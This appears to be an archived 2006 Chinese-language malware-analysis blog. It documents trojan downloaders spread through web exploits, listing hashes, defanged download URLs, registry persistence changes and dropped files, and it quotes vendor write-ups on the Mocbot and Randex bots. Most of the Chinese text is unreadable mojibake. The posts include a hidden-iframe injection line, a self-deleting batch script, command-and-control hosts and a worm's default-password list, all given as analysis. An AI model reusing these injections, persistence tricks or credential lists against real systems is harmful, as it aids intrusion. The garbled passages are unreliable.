kvirus.bokee.com — Tue,05 Sep 2006 09:37:02 CST

v20060903.rar

�ļ��С��31,744�ֽ�
UPX��
CRC32��0A82165F
MD5��F0DDB3C4DF224102521DE9E203177169
��Դ��hxxp://down.ssdlh.com/v20060903.rar

��Ǳ��Ϊ��Trojan.DL.Agent.lkm
��ͱ��Ϊ��Trojan-Downloader.Win32.Agent.aqr

��ʼ��QQ�ļ��ж��

��

һ��ֹ��½��:

[explorer.exe]CommandLine = C:\WINDOWS\Explorer.EXE
[Messenger.exe]CommandLine = "C:\Program Files\Tencent\QQ\Messenger.exe"

��½��explorer.exe

��Ȼ��޸��Ŀ��

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page=http://7b.com.cn/
O1 - Hosts: 127.0.0.1 localhost
O4 - HKLM\..\Run: [KernelFaultCheck] %systemroot%\system32\dumprep 0 -k
O4 - HKLM\..\Run: [Messenger.exe] C:\Program Files\Tencent\QQ\Messenger.exe
O4 - HKLM\..\Run: [Realplayer.exe] C:\Program Files\Tencent\QQ\Messenger.exe
O4 - HKLM\..\Run: [Messager.exe] C:\Program Files\Tencent\QQ\Messenger.exe
O18 - Filter : text/html - {0EB00690-8FA1-11D3-96C7-829E3EA50C29} - C:\WINDOWS\system32\Maxthonz.dll
�п��ܴ��Ŀһ��޸�֮��û�оͲ��ô��ˣ�
[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="hxxp://www.7b.com.cn"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\RunDown\info]
"vvad"="1"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft NT\Windows\CurrentVersion\Winlogon]
"Shell"="Explorer.exe %System%\Messenger.exe"

�ġ�ɾ��ļ��

C:\Program Files\Tencent\QQ\Messenger.exe
C:\Program Files\Tencent\QQ\RTraveler.dll

C:\WINDOWS\system32\Maxthonz.dll
C:\WINDOWS\ghkzooo.bat
C:\WINDOWS\gafsdaz.bat

�塢�޸��ҳ

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]

TKABCרɱ��ߣ�http://space.uwants.com/batch.download.php?aid=86320

ʹ��ǰ��ر��

��վ��wm.htm��ֵıȽ϶�

kvirus.bokee.com — Tue,05 Sep 2006 09:22:10 CST

��ҳ��

hxxp://xxx.tianshigm.com/ViewDownInfo.asp?ID=23067

��´��룺

CODE:
src="hxxp://xxx.7758mm.cn/wm.htm" width=0 height=0>
[Copy to clipboard]

��أ�hxxp://xxx.7758mm.cn/tanip/tan.exe

IEͼ��

UPX��

�ļ��С��22,016�ֽ�

CRC32��5FE149B0

MD5��1A6E5BDCBBD484BFD2F62B11995401C0

��Ǳ��Ϊ��Trojan.DL.Agent.ldq

��ͱ��Ϊ��Trojan-Dropper.Win32.Agent.atp

tan.exe
��Ե��IE
��Deleteme.bat��ɾ��
��
Downexe.exe
Downdll.dll

�²��һ��ѧ��

kvirus.bokee.com — Sat,02 Sep 2006 16:22:27 CST

��ж��ٵ��¹��ܣ��ڰɡ��

��ϲ��

��Ȩ��

[ת��]8088 ��ת

kvirus.bokee.com — Sat,26 Aug 2006 08:31:29 CST

��ժ��ѩѧԺ
��ύ��

�� 8088 ��ת

һ��״̬�Ĵ��

PSW��Program Flag)��״̬�ּĴ��һ��16λ�Ĵ��־��flag��Ϳ��Ʊ�־��ɣ��ʾ��

��

��룺
��OF��Overflow Flag)��־��ʱΪ1,��0��
��SF��Sign Flag��ű�־��Ϊ��ʱ��1,��0.
��ZF��Zero Flag)��־��Ϊ0ʱZFλ��1,��0.
��CF��Carry Flag)��λ��־��λʱ��1,��0.
��AF��Auxiliary carry Flag��λ��־��¼��ʱ��3λ��ֽڣ��Ľ�λ�á��н�λʱ1,��0.
��PF��Parity Flag��ż��־��1�ĸ��Ϊż��ʱ��1,��0.

��Ʊ�־λ��
��DF��Direction Flag��־��ڴ��ָ��п��Ϣ�ķ��
��IF��Interrupt Flag��жϱ�־��
��TF��Trap Flag��ݾ��־��

�� ֱ�ӱ�־ת�ƣ�8λѰַ��

ָ��ʽ	��	��	��...��ת��	�� ��	ָ��ʽ	��	��	��...��ת��
JC	72	C=1	�н�λ		JNS	79	S=0	��
JNC	73	C=0	�޽�λ		JO	70	O=1	��
JZ/JE	74	Z=1	��/��		JNO	71	O=0	��
JNZ/JNE	75	Z=0	��Ϊ��/��		JP/JPE	7A	P=1	��żλΪż
JS	78	S=1	��		JNP/IPO	7B	P=0	��żλΪ��

��ӱ�־ת�ƣ�8λѰַ��

ָ��ʽ	��	��Ը�ʽ	��...��ת��
JA/JNBE(�Ƚ��޷��)	77	C��Z=0	> ��/��ڻ��
JAE/JNB(�Ƚ��޷��)	73	C=0	>=�� ڻ��/��
JB/JNAE(�Ƚ��޷��)	72	C=1	< ��/��ڻ��
JBE/JNA(�Ƚ��޷��)	76	C��Z=1	<=�� ڻ��/��
JG/JNLE(�Ƚϴ��)	7F	(S��O��Z=0	> ��/��С�ڻ��
JGE/JNL(�Ƚϴ��)	7D	S��O=0	>=�� ڻ��/��С��
JL/JNGE(�Ƚϴ��)	7C	S��O=1	< ��С��/��ڻ��
JLE/JNG(�Ƚϴ��)	7E	(S��O)��Z=1	<=�� С�ڻ��/��

�ġ��ת��ָ��(fisheep�� fisheep@sohu.com)

��	α��ָ��	��
EB ��cb	JMP rel8	��Զ��ת��8λ��ʹrel8��Ĵ��λ��һ��ָ��
E9 ��cw	JMP rel16	��ת��16λ��ʹrel16��Ĵ��λ��һ��ָ��
FF ��/4	JMP r/m16	��ת��16λ��һָ��ַ��r/m16�и��
FF ��/4	JMP r/m32	��ת��32λ��һָ��ַ��r/m32�и��
EA ��cb	JMP ptr16:16	Զ��ת�� һָ��ַ�ڲ��
EA ��cb	JMP ptr16:32	Զ��ת�� һָ��ַ�ڲ��
FF ��/5	JMP m16:16	Զ��ת�� һָ��ַ��ڴ�m16:16��
FF�� /5	JMP m16:32	Զ��ת�� һָ��ַ��ڴ�m16:32��

�塢16λ/32λѰַ��ʽ(fisheep�� fisheep@sohu.com)

��	α��ָ��	��ת��	��ת��	��ת��־λ��
0F 87 ��cw/cd	JA rel16/32	��	near	(CF=0 and ZF=0)
0F 83 ��cw/cd	JAE rel16/32	��ڵ��	near	(CF=0)
0F 82�� cw/cd	JB rel16/32	С��	near	(CF=1)
0F 86 ��cw/cd	JBE rel16/32	С�ڵ��	near	(CF=1 or ZF=1)
0F 82�� cw/cd	JC rel16/32	��λ	near	(CF=1)
0F 84 ��cw/cd	JE rel16/32	��	near	(ZF=1)
0F 84 ��cw/cd	JZ rel16/32	Ϊ0	near	(ZF=1)
0F 8F�� cw/cd	JG rel16/32	��	near	(ZF=0 and SF=OF)
0F 8D�� cw/cd	JGE rel16/32	��ڵ��	near	(SF=OF)
0F 8C�� cw/cd	JL rel16/32	С��	near	(SF<>OF)
0F 8E ��cw/cd	JLE rel16/32	С�ڵ��	near	(ZF=1 or SF<>OF)
0F 86�� cw/cd	JNA rel16/32	��	near	(CF=1 or ZF=1)
0F 82�� cw/cd	JNAE rel16/32	��ڵ��	near	(CF=1)
0F 83�� cw/cd	JNB rel16/32	��С��	near	(CF=0)
0F 87�� cw/cd	JNBE rel16/32	��С�ڵ��	near	(CF=0 and ZF=0)
0F 83�� cw/cd	JNC rel16/32	��λ	near	(CF=0)
0F 85�� cw/cd	JNE rel16/32	��	near	(ZF=0)
0F 8E�� cw/cd	JNG rel16/32	��	near	(ZF=1 or SF<>OF)
0F 8C�� cw/cd	JNGE rel16/32	��ڵ��	near	(SF<>OF)
0F 8D�� cw/cd	JNL rel16/32	��С��	near	(SF=OF)
0F 8F�� cw/cd	JNLE rel16/32	��С�ڵ��	near	(ZF=0 and SF=OF)
0F 81�� cw/cd	JNO rel16/32	δ��	near	(OF=0)
0F 8B ��cw/cd	JNP rel16/32	��ż��	near	(PF=0)
0F 89�� cw/cd	JNS rel16/32	�Ǹ��	near	(SF=0)
0F 85 ��cw/cd	JNZ rel16/32	��㣨��ڣ�	near	(ZF=0)
0F 80�� cw/cd	JO rel16/32	��	near	(OF=1)
0F 8A�� cw/cd	JP rel16/32	ż��	near	(PF=1)
0F 8A ��cw/cd	JPE rel16/32	ż��	near	(PF=1)
0F 8B ��cw/cd	JPO rel16/32	��	near	(PF=0)
0F 88�� cw/cd	JS rel16/32	��	near	(SF=1)
0F 84 ��cw/cd	JZ rel16/32	Ϊ�㣨��ڣ�	near	(ZF=1)

ע��һЩָ��ĺ��˵��
�� rel8      ��ʾ 8 λ��Ե�ַ
�� rel16    ��ʾ 16 λ��Ե�ַ
�� rel16/32 ��ʾ 16��32 λ��Ե�ַ
�� r/m16    ��ʾ16λ�Ĵ��
�� r/m32    ��ʾ32λ�Ĵ��

�Ӱ��ü��ͼ��Ķ��ű�

kvirus.bokee.com — Fri,25 Aug 2006 10:07:09 CST

�Ӱ��ü��ͼ��

hxxp://www.z213.com/z213/
��վ�ײ��ű�
hxxp://www.23597.com/pc/css.js

��
clsid:BD96C556-65A3-11D0-983A-00C04FC29E36
g0ld.com

HKEY_CLASSES_ROOT\CLSID\{F084FD46-EB63-4CC0-B814-99C16EE76BD1}\
InProcServer32="C:\\Program Files\\Common Files\\Microsoft Shared\\MSINFO\\InfoMz.Ime"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\ShellExecuteHooks
"{F084FD46-EB63-4CC0-B814-99C16EE76BD1}"=""

�˽ű��ִ��ļ�
hxxp://www.23597.com/pc/ms.exe
��С��10,240 �ֽ�
CRC32:4A2A2584
MD:197534504B4DE5A55479BD757F9FB27C
ASPack 2.12 -> Alexey Solodovnikov
�ļ��Ϣ��
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 1,0,0,0
Product Version            : 1,0,0,0
============================================================
Product Name               : ��ɱ
File Version               : 1.00
Product Version            : 1.00
Company Name               : aaaa
Internal Name              : ms
Original FileName          : ms.exe

��¼�
CLSID {E93AD7C1-C347-11D1-A3E2-00A0C90AEA82}

��hxxp://www.23597.com/pc/ie.exe��c:\ie.exe

hxxp://www.23597.com/pc/ie.exe
��С��17,920 �ֽ�
CRC32:DB8BE872
MD:F815919EB48027E38CC5D33F28B329D7
ASPack 2.12 -> Alexey Solodovnikov
�ļ��Ϣ��£�
Version Information
====================
Operating System           : 32-bit Windows
File Type                  : Application
File Sub-Type              : Unknown
File Version               : 1,0,0,0
Product Version            : 1,0,0,0
============================================================
Product Name               : Microsoft Windows
File Description           : Microsoft Windows
File Version               : 1.00
Product Version            : 1.00
Company Name               : Microsoft Windows
Internal Name              : IE
Legal Copyright            : Microsoft Windows
Original FileName          : IE.exe

hxxp://www.23597.com/pc/adiepage.txt
hxxp://www.23597.com/pc/adlist.txt
    ׷��б��£�
    hxxp://www.z2e3.com/z2e3/8172.htm
    hxxp://www.bfz2e3.com/z2e3/81nc7clink999536.asp
    hxxp://www.bfz2e3.com/z2e3/7town1.asp
    hxxp://www.z2e3.com/z2e3/tc.htm
    hxxp://www.z2e3.com/z2e3/8173.htm
    hxxp://7clink.com/code/list0.asp?username=z213
    hxxp://www.z2e3.com/z2e3/817.htm
hxxp://mm.ok925.com/isi686822.htm
hxxp://www.bfz2e3.com/z2e3/7town2.asp
hxxp://www.bfz2e3.com/z2e3/7town3.asp
hxxp://www.bfz2e3.com/z2e3/7town4.asp
hxxp://www.bfz2e3.com/DHC.asp

hxxp://www.23597.com/pc/adset.txt
hxxp://www.23597.com/pc/ieFavorites.txt
׷�ӡ��ƷӰ��ַΪhxxp://www.259333.com
hxxp://www.23597.com/pc/MMResult.asp

��
%WinDir%\killme.bat
%WinDir%\rundll32.exe
CLSID {FCFB3D23-A0FA-1068-A738-08002B3371B5}
CLSID {E93AD7C1-C347-11D1-A3E2-00A0C90AEA82}
�޸ļ�ֵ��
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Internet Explorer\Main
Software\Policies\Microsoft\Internet Explorer\Control Panel

��ִ�У�killme.bat
�ļ��Ϊ��
@echo off
sleep 100
del ie.exe
del killme.bat
cls
exit

ĳʡ�㲥��Ӵ�ѧԶ��ʽ��̳��Ҷ�

kvirus.bokee.com — Thu,24 Aug 2006 13:45:24 CST

��©��

Exploit.JS.ADODB.Stream.e

Exploit.HTML.Mht

http://xxx.qr.com/gq/wm.htm
Oh,my god! Goldsun[at]84823714
You DO it!

��http://xxx.qr.com/mc/gq.exe

�ļ��С��187392 bytes

CRC32:FB7AEDD3
MD5:5548FBF00DC60706C23D52A35AF48559
MD5 hash:5548fbf00dc60706c23d52a35af48559.
��ļ��£�
C:\WINDOWS\TEMP\7309.exe
C:\WINDOWS\TEMP\7310.exe
C:\WINDOWS\TEMP\7311.exe
C:\WINDOWS\TEMP\7312.exe

��Ǳ��Dropper.Delf.bch
BitDefender Found MemScan:Trojan.PWS.Qqrob.EA
NOD32 Found a variant of Win32/TrojanDownloader.Agent.PD
VBA32 Found Trojan-Downloader.Agent.27 (probable variant)

ͬʱ��ؽű�
http://xxx.qr.com/gq/ah.js
http://xxx.qr.com/jp/jp.html

XX��վ��Ҳ��

kvirus.bokee.com — Thu,24 Aug 2006 10:41:56 CST

��żȻ��XX��ᡱ��վ��ֱ��Ҳ��

��Exploit.JS.ADODB.Stream©��

�ű��أ�hxxp://xxxxxx.cnicb.com/11/du.exe

Ŀǰ��δ��ɱ

Antivirus Version Update Result
AntiVir 6.35.1.3 08.23.2006 HEUR/Trojan.Downloader
Authentium 4.93.8 08.24.2006 no virus found
Avast 4.7.844.0 08.23.2006 no virus found
AVG 386 08.23.2006 no virus found
BitDefender 7.2 08.24.2006 BehavesLike:Trojan.Downloader
CAT-QuickHeal 8.00 08.23.2006 no virus found
ClamAV devel-20060426 08.24.2006 no virus found
DrWeb 4.33 08.23.2006 DLOADER.Trojan
eTrust-InoculateIT 23.72.105 08.24.2006 no virus found
eTrust-Vet 30.3.3035 08.23.2006 no virus found
Ewido 4.0 08.23.2006 no virus found
Fortinet 2.77.0.0 08.23.2006 no virus found
F-Prot 3.16f 08.23.2006 no virus found
F-Prot4 4.2.1.29 08.24.2006 no virus found
Ikarus 0.2.65.0 08.24.2006 no virus found
Kaspersky 4.0.2.24 08.24.2006 no virus found
McAfee 4836 08.23.2006 no virus found
Microsoft 1.1560 08.24.2006 no virus found
NOD32v2 1.1722 08.23.2006 probably a variant of Win32/TrojanDownloader.Dadobra.FX
Norman 5.90.23 08.23.2006 no virus found
Panda 9.0.0.4 08.23.2006 Suspicious file
Sophos 4.08.0 08.24.2006 no virus found
Symantec 8.0 08.23.2006 no virus found
TheHacker 5.9.8.198 08.23.2006 no virus found
UNA 1.83 08.23.2006 no virus found
VBA32 3.11.0 08.23.2006 no virus found
VirusBuster 4.3.7:9 08.23.2006 no virus found

Aditional Information
File size: 18497 bytes
MD5: bee0c22702c4c61b887f5d49a2779f2d
SHA1: cb59c839a4989a22d6c97bc0693254b651b3c78a
CRC32��5150DAF3

��C:\Program Files\Internet Explorer\explorer.exe

��http://xxxxxx.cnicb.com/11/test.exe

MD5 hash: 72f92bee13bdb5661b1f093feeb04218

��

CLSID {8856F961-340A-11D0-A96B-00C04FD705A2}.

��ɱ��2007 / ��Ǹ��˷��ǽ2007 - ��

kvirus.bokee.com — Wed,23 Aug 2006 15:18:40 CST

��ɱ��2007 / ��Ǹ��˷��ǽ2007 - ��

http://www.ikaka.com/2007/index.htm

��ʼʱ�䣺2006��8��23��
��Զ��

��ɱ��2007��԰�
��Ǹ��˷��ǽ2007��԰�
��ɱ��2006�桱��汾��ԣ��ݻ��ԣ�
��԰桰��Ʒ��кš��MI0TMS-5KG75M-QDDLS0-1VE200
��԰桰�û�ID��7AHRR6LPN34G

��԰��ص�ַ��

��ɱ��2007��԰� http://www.ikaka.com/2007/down.asp?t=rav
�� 2006.08.23��汾�ţ�19.02.20��С��39.7M
��Ǹ��˷��ǽ2007��԰� http://www.ikaka.com/2007/down.asp?t=rfw
�� 2006.08.23��汾�ţ�19.02.20��С��9.11M

С��ʾ��ٶȼ��ع��ߡ��[NetAnts]��ʿ쳵[Flashget]��ء�

��Խ��ύ��


	��ɱ��еġ�ר����ť ��Զ��ӵ��վ�Ĺ��ҳ�棬Ҳ��Ǳ�ҳ�� ��д��ť��ձ��е��ĿҪ��д��ύ��

ע��


	��װ��԰汾֮ǰ��ж��ǰ�İ汾��鲻Ҫͬʱ��ɱ��װ��ͬһ̨��ͬһ��ϵͳ�С� ��԰��еġ��û�ע��򵼡��޷�ͨ��⡣ ��԰潫��ڸ��°汾��ֱ��Ի��²��ַ�ʽ��С��͡��ֶ��á��ʱ��ɱ��еġ��ǽ��еġ��ť��У��á��ֶ��ʱÿ��°汾�Ĳ��԰氲װ��Ҫж��ǰ�İ汾Ȼ��°�װ�� ��ɺ��Ҫ��н�һ��ԣ��ж�ء��ɱ��2007��԰漰��Ǹ��˷��ǽ2007��԰棬��Ӱ��װ��ʽ�汾��ļ��ʹ�ô��㡣

��


	��ι��Բ�ȡ��Ը�μӵ�ԭ��ǹ�˾��롢��ǿ��κ��κ��ʽ�μӴ˴β��Ի�� ��Խ׶ε��Ʒ��ڲ��ԣ��п��ܻᵼ�¼��쳣��ʧ��ϣ��û��ڲ��ǰ��ϵͳ��ݱ��ݡ��ڳ��쳣��ɵ��ʧ��ǿƼ��ɷ��޹�˾�Ų��಻�е��κη��Ρ� ��λ��ս��Ȩ�鱱��ǿƼ��ɷ��޹�˾��С�

��Խ��

��ڴ˴ι����ǹ�˾��ڱ��ι��Խ��󣬴�Ϊ��ʵ�ʹ��׵Ĳβ��Ա��ѡ��481��費ͬ�̶ȵĽ��ڲ��Ի��չ��

��	��	��Ʒ��
��Ѳ��Խ�	1��	��ֽ�5000Ԫ�󽱣��н��żȻ��˰��ǹ�˾��۴��ɣ�
ͻ��׽�	30��	ÿ�˽��á��Ϊ3COM BR104 ��ͥ·��һ̨
��۽𾦽�	50��	ÿ�˽��á��ʼǱ��԰��һ��
��㽨�齱	100��	ÿ�˽��á��濨��ʨ�ӡ��ë��ߣ�һ��
��뽱	300��	ÿ�˽��ɱ��ǽ��ϰ棨��⿨��

ֵ��ע��bot

kvirus.bokee.com — Wed,23 Aug 2006 12:45:07 CST

ֵ��ע��

1. Symantec: W32.Randex.GEL

2. Mcafee: W32/Sdbot.worm!MS06-040

3. Sophos: W32/Vanebot-A

4. Kingsoft Duba: Worm.VaneBot.a

�� Symantec��

When W32.Randex.GEL is executed, it performs the following actions:

Creates the following file:

%System%\javanet.exe
Adds the value:

"MS Java for Windows XP & NT" = "javanet.exe"

to the registry subkeys:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices

so that the worm starts when Windows starts.
Adds the values:

"Shell" = "Explorer.exe javanet.exe"
"Userinit" = "%System%\userinit.exe,javanet.exe"

to the registry subkey:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windlogon

so that the worm starts when Windows starts.
Adds the value:

"JavaNet" = "rBot v2 a.k.a. the next generation (working on winXP SP2)"

to the registry subkey:

HKEY_CURRENT_USER\Software\Microsoft\Windows
Modifies the value:

"EnableDCOM" = "N"

in the registry subkey:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Ole

which disables DCOM on the compromised computer.
Modifies the value:

"restrictanonymous" = "1"

in the registry subkey:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa

which prevents NULL session enumeration of the host.
Modifies the value:

"Start" = "4"

in the registry subkeys:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\wuauserv
Attempts to steal information entered into browser windows with the following URL:

e-gold.com[REMOVED]
Opens a back door on the compromised computer, connecting to the forum.ednet.es IRC server on TCP port 4915.
Listens for commands, which may allow a remote attacker to perform some of the following actions on the compromised computer:
- Download and execute files
- List, stop, and start processes and threads
- Launch SYN, UDP and HTTP denial of service attack
- Open a command shell on the compromised computer
- Start a SOCKS4 proxy server
- Log keystrokes
Uses MSN Messenger, Yahoo Messenger, AOL Instant Messenger and ICQ to spread.
Copies itself to network shares and Microsoft SQL servers, using the following list of usernames and passwords:

User names:
- admin
- root
- asdfgh
- server
- 0
- 00
- 000
- 0000
- 00000
- 000000
- 0000000
- 00000000
- 1
- 12
- 123
- 1234
- 12345
- 123456
- 1234567
- 12345678
- 123456789
- secret
- secure
- security
  
  Passwords:
- setup
- shadow
- shit
- sql
- super
- sys
- system
- abc
- abc123
- access
- adm
- alpha
- anon
- anonymous
- backdoor
- backup
- beta
- bin
- coffee
- computer
- crew
- database
- debug
- default
- demo
- free
- go
- guest
- hello
- install
- internet
- login
- mail
- manager
- money
- monitor
- network
- new
- newpass
- nick
- nobody
- nopass
- one
- oracle
- pass
- passwd
- password
- poiuytre
- private
- pub
- public
- qwerty
- random
- real
- remote
- ruler
- telnet
- temp
- test
- test1
- test2
- visitor
- web
- windows
Spreads to other computers by exploiting one or more the following vulnerabilities:
- The Microsoft ASN.1 Library Multiple Stack-Based Buffer Overflow Vulnerabilities (as described in Microsoft Security Bulletin MS04-007)
- The Microsoft Windows Message Queuing Remote Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS05-017)
- The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039)
- The Microsoft Windows Server Service Remote Buffer Overflow Vulnerability (as described in Microsoft Security Bulletin MS06-040)

SMSS.EXE OR LSASS.EXE OR WINLOGON��޸��

kvirus.bokee.com — Tue,15 Aug 2006 20:52:24 CST

��Ⱦ��Ҫ�ص��ǣ��ദ��д��ŵ��ʹ��

�޸��

1��ǿ��ֹ��ðϵͳ��WINLOGON��LSASS��SMSS��Ҫ��

2��븽��ע��޸��ļ��Ȼ��ɱ��ɱ�ɾ��ͻ��Щ��ˡ�

�޸��ļ��ݣ�http://kvirus.bokee.com/5534013.html

��ҵ�XPϵͳ�Ͻ��ġ�

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\exefile\shell\open\command]
@="\"%1\" %*"

[HKEY_CLASSES_ROOT\.lnk\ShellNew]
"Command"="rundll32.exe appwiz.cpl,NewLinkHere %1"

[HKEY_CLASSES_ROOT\Applications\iexplore.exe\shell\open\command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" %1"

[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}

\shell\OpenHomePage\Command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\""

[HKEY_CLASSES_ROOT\cplfile\shell\cplopen\command]
@="rundll32.exe shell32.dll,Control_RunDLL \"%1\",%*"

[HKEY_CLASSES_ROOT\Drive\shell\find\command]
@="%SystemRoot%\\explorer.exe"

[HKEY_CLASSES_ROOT\dunfile\shell\open\command]
@="%SystemRoot%\\system32\\rundll32.exe NETSHELL.DLL,InvokeDunFile %1"

[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\ftp\shell\open\command]
@=""C:\Program Files\Internet Explorer\iexplore.exe" "

[HKEY_CLASSES_ROOT\htmlfile\shell\opennew\command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" %1"

[HKEY_CLASSES_ROOT\HTTP\shell\open\command]
@="\"C:\\Program Files\\Internet Explorer\\iexplore.exe\" %1"

[HKEY_CLASSES_ROOT\inffile\shell\Install\command]
@="%SystemRoot%\\System32\\rundll32.exe setupapi,InstallHinfSection DefaultInstall

132 %1"

[HKEY_CLASSES_ROOT\InternetShortcut\shell\open\command]
@="find.exe ieframe.dll,OpenURL %l"

[HKEY_CLASSES_ROOT\scrfile\shell\install\command]
@="find.exe desk.cpl,InstallScreenSaver %l"

[HKEY_CLASSES_ROOT\scriptletfile\Shell\Generate Typelib\command]
@="find.exe C:\\WINDOWS\\System32\\scrobj.dll,GenerateTypeLib \"%1\""

[HKEY_CLASSES_ROOT\telnet\shell\open\command]
@="find.exe url.dll,TelnetProtocolHandler %l"

[HKEY_CLASSES_ROOT\Unknown\shell\openas\command]
@=%SystemRoot%\system32\rundll32.exe %SystemRoot%\system32\shell32.dll,OpenAs_RunDLL %1

[-HKEY_CLASSES_ROOT\winfiles\Shell\Open\Command]

[HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet]
@="iexplore.exe"

[-HKEY_LOCAL_MACHINE\SOFTWARE\Clients\StartMenuInternet\iexplore.pif]

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"TProgram"=-
"Torjan Program"=-

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"Shell"="Explorer.exe"
"Userinit"="C:\\WINDOWS\\system32\\userinit.exe,"

Free F-Secure Anti-Virus 2006 AND KAV 6.0

kvirus.bokee.com — Mon,14 Aug 2006 09:00:13 CST

Free F-Secure Anti-Virus 2006 licenz till 15.07.2007 [CHIP 08/06]

The German 'Chip' is giving away free F-Secure Anti-Virus 2006 licenses.

You get the licens here for free:
http://www.f-secure.de/chip

It's in German but i think it is easy to understand, but here a translation German - English

Ihre E-Mail Adresse - Your email Adress
Anrede: Herr - Mr.; Frau - Mrs.
Ihr Vorname - First Name
Ihr Nachname - Last name

Than klick on 'Daten senden' and the licens will be send to your e-mail.

AOL Active virus Shield(KAV 6.0) FREE!!!!!

I just went to download.com and saw this shocker Kaspersky's AV 6.0 is being dubbed as Aol Active virus shield and provided free....

www.activevirusshield.com
And as posted in the post about security suite,its not limited to aol users its free for everyone
Download.Com-http://www.download.com/AOL-Active-V...ml?tag=sptlt_s

��桰ħ��SVCHOST.EXE��

kvirus.bokee.com — Mon,14 Aug 2006 08:57:39 CST

��ĳ��վ�� ػ��һ�� MS06-040 ©��没�� Ҫ�� win200ϵͳ
�ò�� ϵͳ�ļ��ͷ� wgareg.exe ��wgavm.exe�ļ�
��ϵͳ�н��·��
�� wgareg
�� Windows Genuine Advantage Registration Service ��windows�� ֤ ��
�� Ensures that your copy of Microsoft Windows is genuine and registered. Stopping or disabling this service will result in system instability.

�� wgavm
�� Windows Genuine Advantage Validation Monitor
�� Ensures that your copy of Microsoft Windows is genuine. Stopping or disabling this service will result in system instability..
��Կ�� αװ windows�� ֤��
��Ҳ��Զ�ʹ��TCP 18067�˿� ��bbjj.househot.com ypgw.wallloan.com

��ڴ˲�� Է��Ԥ��취 �Ͽ�� MS06-040 ��

��Ŀǰ��Ⱦ��XPϵͳ��谡��

The bot connects to a specified channel and awaits commands, including:

DDoS Scan (for vulnerable systems) Download / execute remote filesOnce instructed, the bot scans the class A subnet addresses, sending SYN packets via TCP 139 (netbios), and 445 (microsoft-ds), looking for systems vulnerable to the MS06-040 vulnerability. When a vulnerable system is discovered, the infected host causes a buffer overflow to occur on the remote system, instructing it to download Mocbot, save it to the WINDOWS SYSTEM directory as a file named .exe and then execute it. Unlike many exploiting bots, Mocbot doesn't use FTP or TFTP to achieve the downloading, but rather contains its own downloader code. The remote system downloads the worm via a random TCP port..

The hard-coded command and control servers are:

bniu.househot.com
ypgw.wallloan.com
The IP addresses currently pointed to by these hostnames are:

58.81.137.157
61.163.231.115
61.189.243.240
202.121.199.200
211.154.135.30
218.61.146.86

��ҸϿ�ȥWINDOWSUPDATE�ɡ��

http://www.microsoft.com/china/technet/Security/bulletin/ms06-040.mspx

Mocbot��ٴα��SVCHOST.EXEӦ�ó��

kvirus.bokee.com — Mon,14 Aug 2006 00:53:02 CST

CISRT��Ϣ��
Chinese Internet Security Response Team
http://www.cisrt.org/blog/read.php?62

Mocbot.b��MS06-040©��ˣ��MS06-040��죬��ȥ��Zotob��ٶȲ�ࡣ

��Ŀǰ�ռ��γ��ֵ��֣��Ǵ�ԭ��MS05-039©��Mocbot��¶��ģ��ԭ��MS05-039©��Ĺ��滻��MS06-040��롣��ǹ��ˣ��ͨ��18067�˿��IRC��

��

bniu.househot.com
ypgw.wallloan.com

��Ӱ��WIN2000��ϵͳ��

��ֵ�һЩ��
wgareg.exe (MD5: 9928a1e6601cf00d0b7826d13fb556f0)
��: wgareg
��ʾ��: Windows Genuine Advantage Registration Service
��: Ensures that your copy of Microsoft Windows is genuine and registered. Stopping or disabling this service will result in system instability.

wgavm.exe (MD5: 2bf2a4f0bdac42f4d6f8a062a7206797)
��: wgavm
��ʾ��: Windows Genuine Advantage Validation Monitor
��: Ensures that your copy of Microsoft Windows is genuine. Stopping or disabling this service will result in system instability.

��ĿǰһЩ��˾��ֵ��

1. Trend Micro��WORM_IRCBOT.JK
WORM_IRCBOT.JL

2. F-Secure��IRCBot.st

3. Computer Associates��Win32/Cuebot.J

4. Mcafee��IRC-Mocbot!MS06-040

��༭�� Сİ �༭��2006/08/14 00:13

�ӽ��翪ʼ��ڴ��û��һ��ͬ��֡�SVCHOST.EXEӦ�ó����ͬʱ��Ҳ�յ��̨�塢��ۡ��ǵȵ��ı��棬��ͼ��

500) {this.resized=true; this.width=500;} } } } } }" border="0" />

500) {this.resized=true; this.width=500;} } } } } }" border="0" />

��ִ��ǳ��԰�װMS06-040��ܷ��ǵ��⡣��Ļ��Ӻ��ԣ��߿��Է��mail��ǣ��ǵ�mail��ַ�ǣ�cisrt@cisrt.com��

MS06-040��ַ��Server ��е�©��Զ��ִ�д�� (921883)

ͬʱ��Ѽ��ǵ�ϵͳ��Ƿ��wgareg.exe��wgavm.exe��ļ��Լ����ڵĻ��Ǻܿ��Ѿ��Mocbot�ı��֡��е�ɱ��ɱ��

hzq:

C:\WINDOWS\system32\wgareg.exe
